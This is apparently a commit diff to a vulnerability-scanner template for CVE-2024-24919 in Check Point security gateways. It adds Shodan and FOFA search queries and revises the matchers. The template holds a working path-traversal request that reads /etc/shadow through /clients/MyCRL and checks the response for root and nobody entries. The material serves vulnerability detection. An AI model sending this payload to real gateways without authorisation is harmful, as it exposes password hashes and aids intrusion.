modified regex and added more request parameters

http/cves/2024/CVE-2024-24919.yaml

@@ -5,7 +5,7 @@ info:
  author: johnk3r
  severity: high
  description: |
- CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.
+ CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN, or mobile access software blade.
  reference:
  - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
  - https://support.checkpoint.com/results/sk/sk182337
@@ -14,7 +14,10 @@ info:
  max-request: 1
  vendor: checkpoint
  product: quantum_security_gateway
- shodan-query: html:"Check Point SSL Network"
+ shodan-query:
+ - html:"Check Point SSL Network"
+ - http.html:"check point ssl network"
+ fofa-query: body="check point ssl network"
  cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*
  tags: cve,cve2024,checkpoint,lfi
 
@@ -23,6 +26,7 @@ http:
  - |
  POST /clients/MyCRL HTTP/1.1
  Host: {{Hostname}}
+ Accept-Encoding: gzip
 
  aCSHELL/../../../../../../../etc/shadow
 
@@ -31,11 +35,10 @@ http:
  - type: regex
  part: body
  regex:
- - "root:"
- - "nobody:"
+ - "root:.*"
+ - "nobody:.*"
  condition: and
 
  - type: status
  status:
  - 200
-# digest: 490a0046304402200cbd9f1fc5ea98e5649de5e1b43d62d38241188c12d1f4cf19709e2b2aab31a50220643a5fbf43545d89dd02819e0e92ee7fb898212836c04be5c18d446b1950705d:922c64590222798bb761d5b6d8e72950